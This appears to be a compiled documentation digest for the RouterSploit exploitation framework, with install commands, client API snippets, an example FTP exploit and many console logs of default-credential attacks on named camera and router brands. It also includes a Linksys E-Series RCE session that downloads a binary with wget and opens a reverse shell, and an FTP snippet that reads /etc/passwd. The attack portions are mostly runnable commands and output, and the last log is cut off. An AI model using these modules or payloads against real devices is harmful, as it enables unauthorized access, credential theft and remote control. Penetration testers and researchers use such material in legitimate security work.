### HTTP Request Examples with HTTPClient Source: https://context7.com/threat9/routersploit/llms.txt Demonstrates various HTTP request methods (GET, POST), custom headers, basic authentication, and session management using HTTPClient. Ensure the target HTTP server is reachable before execution. ```python from routersploit.core.exploit import * from routersploit.core.http.http_client import HTTPClient import requests class Exploit(HTTPClient): target = OptIP("", "Target IPv4 or IPv6 address") port = OptPort(80, "Target HTTP port") def run(self): # Test reachability if not self.http_test_connect(): print_error("Target HTTP server is not reachable") return # GET request response = self.http_request(method="GET", path="/config.cgi") if response: print_info(response.text) # POST with form data response = self.http_request( method="POST", path="/login.cgi", data={"login": "admin", "password": "admin"}, ) if response and "login successful" in response.text: print_success("Authenticated!") # Custom headers response = self.http_request( method="POST", path="/xml.cgi", headers={"Content-Type": "text/xml", "X-Requested-With": "XMLHttpRequest"}, data="TEST", ) # Basic auth response = self.http_request( method="GET", path="/admin/", auth=("admin", "admin"), ) if response and response.status_code == 200: print_success("Basic auth succeeded") # Session / cookie persistence session = requests.Session() self.http_request(method="POST", path="/auth.php", session=session, data={"user": "admin", "pass": "admin"}) # Subsequent requests in the same session carry the auth cookie automatically response = self.http_request(method="GET", path="/dashboard", session=session) # Build the full target URL url = self.get_target_url(path="/cgi-bin/login.cgi") print_info("Login URL: {}".format(url)) # Output: http://192.168.1.1:80/cgi-bin/login.cgi (or https:// when ssl=true) ``` -------------------------------- ### FTPCli.connect Example Source: https://github.com/threat9/routersploit/wiki/FTP-Client Establishes a connection to the FTP server. The connection attempt can be retried a specified number of times. ```python ftp_client = self.ftp_create() if ftp_client.connect(): print_status("Connection was successful") ``` -------------------------------- ### Run IQInvision Camera Default Telnet Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/iqinvision/telnet_default_creds.md This example demonstrates the command-line usage of the module. Set the target IP address and run the module to initiate the default credential attack. ```bash rsf > use creds/cameras/iqinvision/telnet_default_creds rsf (IQInvision Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### FTPClient.ftp_create Example Source: https://github.com/threat9/routersploit/wiki/FTP-Client Use this method to create an FTPCli object for FTP communication. It accepts optional target IP and port parameters. ```python ftp_client = self.ftp_create() ``` -------------------------------- ### Example Exploit-DB Reference Source: https://github.com/threat9/routersploit/wiki/Contribution-Guidelines This is an example of a reference format for exploits found on Exploit-DB, useful when reporting issues or documenting findings. ```text References: - https://www.exploit-db.com/exploits/24975/ ``` -------------------------------- ### Run Honeywell Camera Telnet Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/honeywell/telnet_default_creds.md This example demonstrates the command-line usage of the module. Set the target IP and run the module to initiate the default credentials attack. ```bash rsf > use creds/cameras/honeywell/telnet_default_creds rsf (Honeywell Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Honeywell Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### FTPCli.login Example Source: https://github.com/threat9/routersploit/wiki/FTP-Client Logs into the FTP server using provided username and password. Authentication is required before performing other operations. ```python ftp_client = self.ftp_create() if ftp_client.connect(): if ftp_client.login("admin", "admin"): print_success("Successful authentication to FTP server") ``` -------------------------------- ### Run PFSense Router Telnet Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/pfsense/telnet_default_creds.md This example demonstrates the command-line usage of the module. Set the target IP address and run the module to initiate the credential attack. ```bash rsf > use creds/routers/pfsense/telnet_default_creds rsf (PFSense Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (PFSense Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### Run Basler Camera Telnet Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/basler/telnet_default_creds.md This example demonstrates the command-line usage of the module. Set the target IP address and run the module to initiate the attack. ```bash rsf > use creds/cameras/basler/telnet_default_creds rsf (Basler Camera Telnet Default Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Basler Camera Telnet Default Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### Example FTP Exploit Source: https://github.com/threat9/routersploit/wiki/FTP-Client This exploit demonstrates how to use the FTPClient to connect to a target FTP server, attempt to log in with default credentials, and handle connection or authentication failures. ```python from routersploit.core.exploit import * from routersploit.core.ftp.ftp_client import FTPClient class Exploit(FTPClient): __info__ = { "name": "Example FTP exploit", "description": "FTP exploit description", "authors": ( "John Smith", ), "references": ( "https://www.threat9.com", ), "devices": ( "D-Link Devices", ) } target = OptIP("", "Target IPv4 or IPv6 address") port = OptPort(21, "Target FTP port") def run(self): ftp_client = self.ftp_create() if ftp_client.connect(): if ftp_client.login("admin", "admin"): print_info("Default credentials: admin/admin") else: print_error("Exploit failed - could not authenticate to FTP server") ftp_client.close() return print_error("Exploit failed - could not connect to FTP server") @mute def check(self): return None ``` -------------------------------- ### Run Sentry360 Camera Telnet Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/sentry360/telnet_default_creds.md This example demonstrates the command-line usage of the `creds/cameras/sentry360/telnet_default_creds` module within the Routersploit framework. It shows how to set the target IP address and execute the module to find default Telnet credentials. ```bash rsf > use creds/cameras/sentry360/telnet_default_creds rsf (Sentry360 Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Sentry360 Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### Run Zyxel SSH Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/zyxel/ssh_default_creds.md This example demonstrates how to use the Zyxel SSH default credentials module. Set the target IP and run the module to check for default credentials. ```bash rsf > use creds/routers/zyxel/ssh_default_creds rsf (Zyxel Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Zyxel Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` -------------------------------- ### Install RouterSploit on Ubuntu 18.04/17.10 Source: https://github.com/threat9/routersploit/wiki/Installation Installs RouterSploit on Ubuntu systems. Includes adding the universe repository, installing pip, cloning the repository, and installing requirements. ```bash sudo add-apt-repository universe sudo apt-get install git python3-pip git clone https://www.github.com/threat9/routersploit python3 -m pip install -r requirements python3 rsf.py ``` -------------------------------- ### Run Mikrotik FTP Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/mikrotik/ftp_default_creds.md This example demonstrates the command-line usage of the Mikrotik Router Default FTP Creds module. It shows how to select the module, set the target IP address, and execute the attack. The output displays the progress, authentication attempts, and any successfully found credentials. ```bash rsf > use creds/routers/mikrotik/ftp_default_creds rsf (Mikrotik Router Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` -------------------------------- ### Install RouterSploit on Kali Linux Source: https://github.com/threat9/routersploit/wiki/Installation Installs RouterSploit and its dependencies on Kali Linux using apt and pip. Executes the framework after installation. ```bash apt-get install python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py ``` -------------------------------- ### Install RouterSploit on OSX Source: https://github.com/threat9/routersploit/blob/master/README.md Installs RouterSploit and its dependencies on OSX. ```bash git clone https://www.github.com/threat9/routersploit cd routersploit sudo python3 -m pip install -r requirements.txt python3 rsf.py ``` -------------------------------- ### Run Speco Camera SSH Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/speco/ssh_default_creds.md This example demonstrates the command-line usage of the Speco Camera SSH Default Creds module. It shows how to select the module, set the target IP address, and run the attack. The output displays the progress and any successful credentials found. ```bash rsf > use creds/cameras/speco/ssh_default_creds rsf (Speco Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Speco Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` -------------------------------- ### Install Bluetooth Support on Kali Linux Source: https://github.com/threat9/routersploit/wiki/Installation Installs Bluetooth Low Energy support for RouterSploit on Kali Linux. Requires additional system packages and a pip install. ```bash apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` -------------------------------- ### Install RouterSploit on macOS Source: https://context7.com/threat9/routersploit/llms.txt Installs RouterSploit on macOS, including dependencies and the framework itself. ```bash # macOS git clone https://www.github.com/threat9/routersploit cd routersploit sudo python3 -m pip install -r requirements.txt python3 rsf.py ``` -------------------------------- ### Arecont Camera FTP Default Creds Scenario Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/arecont/ftp_default_creds.md This example demonstrates the command-line interaction for using the Arecont Camera FTP Default Creds module. It shows how to set the target, run the module, and interpret the output, including successful authentication. ```bash rsf > use creds/cameras/arecont/ftp_default_creds rsf (Arecont Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Arecont Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` -------------------------------- ### Install RouterSploit via Docker Source: https://context7.com/threat9/routersploit/llms.txt Installs and runs RouterSploit using Docker Compose for containerized deployment. ```bash # Docker git clone https://www.github.com/threat9/routersploit cd routersploit docker compose up --build -d docker attach routersploit ``` -------------------------------- ### Run Mikrotik Telnet Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/mikrotik/telnet_default_creds.md This example demonstrates the command-line usage of the Mikrotik Router Default Telnet Creds module. It shows how to select the module, set the target IP address, and initiate the attack. The output displays the progress and results, including successful credential discovery. ```bash rsf > use creds/routers/mikrotik/telnet_default_creds rsf (Mikrotik Router Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### Install RouterSploit on Kali/Ubuntu Source: https://context7.com/threat9/routersploit/llms.txt Installs RouterSploit on Kali Linux or Ubuntu 20.04, including dependencies and the framework itself. ```bash # Kali Linux / Ubuntu 20.04 apt-get install python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py ``` -------------------------------- ### Install Bluetooth Low Energy Support Source: https://context7.com/threat9/routersploit/llms.txt Installs the necessary package for Bluetooth Low Energy support in RouterSploit. ```bash # Optional: Bluetooth Low Energy support apt-get install libglib2.0-dev python3 -m pip install bluepy ``` -------------------------------- ### Run Avtech Camera SSH Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/avtech/ssh_default_creds.md This example demonstrates the command-line usage of the Avtech Camera SSH Default Creds module within the routersploit framework. It shows how to set the target IP address and execute the module to find default credentials. ```bash rsf > use creds/cameras/avtech/ssh_default_creds rsf (Avtech Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avtech Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` -------------------------------- ### Run Avigilon Camera Telnet Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/avigilon/telnet_default_creds.md This example demonstrates the command-line usage of the Avigilon Camera Default Telnet Creds module. It shows how to set the target IP address and execute the module to scan for default credentials. ```bash rsf > use creds/cameras/avigilon/telnet_default_creds rsf (Avigilon Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Avigilon Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### Run IQInvision Camera FTP Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/iqinvision/ftp_default_creds.md Execute the module to scan for default FTP credentials on an IQInvision camera. Ensure the target IP address is set correctly before running. ```text rsf > use creds/cameras/iqinvision/ftp_default_creds rsf (IQInvision Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' Password: '123456' [+] Authenticated Succeed - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 0.06290411949157715 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 21 ftp admin admin ``` -------------------------------- ### Install RouterSploit on Ubuntu 20.04 Source: https://github.com/threat9/routersploit/blob/master/README.md Installs RouterSploit and its dependencies on Ubuntu 20.04. Includes steps for Bluetooth Low Energy support. ```bash sudo apt-get install git python3-pip git clone https://github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py ``` ```bash sudo apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` -------------------------------- ### Run Mobotix Camera Telnet Default Creds Attack Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/mobotix/telnet_default_creds.md This example demonstrates the command-line usage of the Mobotix Camera Telnet Default Creds module. It shows how to set the target IP address and execute the attack to find default credentials. ```bash rsf > use creds/cameras/mobotix/telnet_default_creds rsf (Mobotix Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mobotix Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### Install RouterSploit on Kali Linux Source: https://github.com/threat9/routersploit/blob/master/README.md Installs RouterSploit and its dependencies on Kali Linux. Includes steps for Bluetooth Low Energy support. ```bash apt-get install python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py ``` ```bash apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` -------------------------------- ### Running the GeoVision Camera SSH Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/geovision/ssh_default_creds.md This example demonstrates the command-line interaction to use the GeoVision Camera Default SSH Creds module, set the target IP, and run the attack. It shows the expected output, including failed and successful authentication attempts, and the final display of found credentials. ```bash rsf > use creds/cameras/geovision/ssh_default_creds rsf (GeoVision Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (GeoVision Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` -------------------------------- ### Install RouterSploit on Ubuntu 18.04 & 17.10 Source: https://github.com/threat9/routersploit/blob/master/README.md Installs RouterSploit and its dependencies on Ubuntu 18.04 and 17.10. Includes steps for Bluetooth Low Energy support. ```bash sudo add-apt-repository universe sudo apt-get install git python3-pip git clone https://www.github.com/threat9/routersploit cd routersploit python3 -m pip install setuptools python3 -m pip install -r requirements.txt python3 rsf.py ``` ```bash apt-get install libglib2.0-dev python3 -m pip install bluepy python3 rsf.py ``` -------------------------------- ### HTTPClient.http_request: Retrieve data with GET Source: https://github.com/threat9/routersploit/wiki/HTTP-Client Use this snippet to retrieve data from a specified path using the HTTP GET method. Ensure the path is correctly formatted. ```python response = self.http_request( method="GET", path="/config.cgi", ) if response: print_info(response.text) ``` -------------------------------- ### Run Vacron Camera Default Telnet Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/vacron/telnet_default_creds.md This example demonstrates the command-line usage of the Vacron Camera Default Telnet Creds module within the routersploit framework. It shows how to set the target IP address and execute the module to find default credentials. ```bash rsf > use creds/cameras/vacron/telnet_default_creds rsf (Vacron Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Vacron Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### Run Mikrotik SSH Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/routers/mikrotik/ssh_default_creds.md This example demonstrates the command-line usage of the Mikrotik SSH default credentials module within the routersploit framework. It shows how to select the module, set the target IP address, and execute the attack, including sample output indicating successful and failed authentication attempts. ```bash rsf > use creds/routers/mikrotik/ssh_default_creds rsf (Mikrotik Router Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Mikrotik Router Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` -------------------------------- ### SSHCli.interactive Source: https://github.com/threat9/routersploit/wiki/SSH-Client Starts an interactive session with the SSH server. ```APIDOC ## SSHCli.interactive ### Description Starts an interactive session with the SSH server. ### Parameters * None ### Response * None ``` -------------------------------- ### FTPCli.close Example Source: https://github.com/threat9/routersploit/wiki/FTP-Client Closes the active FTP connection. It's important to close the connection after completing operations to free up resources. ```python ftp_client = self.ftp_create() if ftp_client.connect(): print_status("Start to close connection") ftp_client.close() ``` -------------------------------- ### Exploit Module Usage Source: https://github.com/threat9/routersploit/blob/master/docs/modules/exploits/routers/linksys/eseries_themoon_rce.md Demonstrates the steps to use the exploit module, including setting the target, running the exploit, and configuring a reverse TCP payload. ```text rsf > use exploits/routers/linksys/eseries_themoon_rce rsf (Linksys E-Series TheMoon RCE) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Linksys E-Series TheMoon RCE) > run [*] Running module... [+] Target appears to be vulnerable [+] Welcome to cmd. Commands are sent to the target via the execute method. [*] For further exploitation use 'show payloads' and 'set payload ' commands. cmd > show payloads [*] Available payloads: Payload Name Description ------- ---- ----------- bind_tcp MIPSBE Bind TCP Creates interactive tcp bind shell for MIPSBE architecture. reverse_tcp MIPSBE Reverse TCP Creates interactive tcp reverse shell for MIPSBE architecture. cmd > set payload reverse_tcp cmd (MIPSBE Reverse TCP) > show options Payload Options: Name Current settings Description ---- ---------------- ----------- lhost Connect-back IP address lport 5555 Connect-back TCP Port cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4 lhost => 192.168.1.4 cmd (MIPSBE Reverse TCP) > run [*] Using wget method [*] Using wget to download binary [*] Executing payload on the device [*] Waiting for reverse shell... [*] Connection from 192.168.1.1:41933 [+] Enjoy your shell ``` -------------------------------- ### FTPCli.get_content Example Source: https://github.com/threat9/routersploit/wiki/FTP-Client Retrieves the content of a specified file from the remote FTP server. Ensure a connection and successful login before calling this method. ```python ftp_client = self.ftp_create() if ftp_client.connect(): print_status("Connection to FTP server was successful") response = ftp_client.get_content("/etc/passwd") if response: print_status("Downloaded /etc/passwd from remote server") print_info(response) ``` -------------------------------- ### Run Speco Camera Telnet Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/speco/telnet_default_creds.md Demonstrates the command-line usage of the Speco Camera Telnet Default Creds module. Set the target IP and run the module to initiate the dictionary attack. ```bash rsf > use creds/cameras/speco/telnet_default_creds rsf (Speco Camera Default Telnet Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Speco Camera Default Telnet Creds) > run [*] Running module... [*] Target exposes Telnet service [*] Starting default credentials attack against Telnet service [*] thread-0 thread is starting... [-] Telnet Authentication Failed - Username: 'admin' Password: 'admin' [-] Telnet Authentication Failed - Username: '1234' Password: '1234' [-] Telnet Authentication Failed - Username: 'root' Password: '12345' [-] Telnet Authentication Failed - Username: 'root' Password: 'root' [+] Telnet Authentication Successful - Username: 'user' Password: 'user' [*] thread-0 thread is terminated. [*] Elapsed time: 5.389287948608398 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 23 telnet user user ``` -------------------------------- ### Run IQInvision Camera SSH Default Creds Module Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/iqinvision/ssh_default_creds.md This snippet demonstrates the command-line usage of the module. Set the target IP address and run the module to initiate the attack. ```bash rsf > use creds/cameras/iqinvision/ssh_default_creds rsf (IQInvision Camera Default SSH Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (IQInvision Camera Default SSH Creds) > run [*] Running module... [*] Target exposes SSH service [*] Starting default credentials attack against SSH service [*] thread-0 thread is starting... [-] SSH Authentication Failed - Username: 'admin' Password: '12345' [-] SSH Authentication Failed - Username: 'admin' Password: '123456' [-] SSH Authentication Failed - Username: 'Admin' Password: '12345' [-] SSH Authentication Failed - Username: 'Admin' Password: '123456' [+] SSH Authentication Successful - Username: 'admin' Password: 'admin' [*] thread-0 thread is terminated. [*] Elapsed time: 2.3932292461395264 seconds [+] Credentials found! Target Port Service Username Password ------ ---- ------- -------- -------- 192.168.1.1 22 ssh admin admin ``` -------------------------------- ### Telnet Client Example Exploit Source: https://github.com/threat9/routersploit/wiki/Telnet-Client This is a placeholder for an exploit that utilizes Telnet communication as a client. Specific implementation details would follow. ```python ``` -------------------------------- ### Honeywell Camera FTP Default Creds Module Execution Source: https://github.com/threat9/routersploit/blob/master/docs/modules/creds/cameras/honeywell/ftp_default_creds.md Demonstrates the command-line usage for the Honeywell Camera FTP Default Creds module. It shows how to select the module, set the target IP address, and run the attack. ```bash rsf > use creds/cameras/honeywell/ftp_default_creds rsf (Honeywell Camera Default FTP Creds) > set target 192.168.1.1 [+] target => 192.168.1.1 rsf (Honeywell Camera Default FTP Creds) > run [*] Running module... [*] Target exposes FTP service [*] Starting attack against FTP service [*] thread-0 thread is starting... [-] Authentication Failed - Username: 'admin' Password: '12345' [-] Authentication Failed - Username: 'admin' Password: '123456' [-] Authentication Failed - Username: 'Admin' Password: '12345' [-] Authentication Failed - Username: 'Admin' 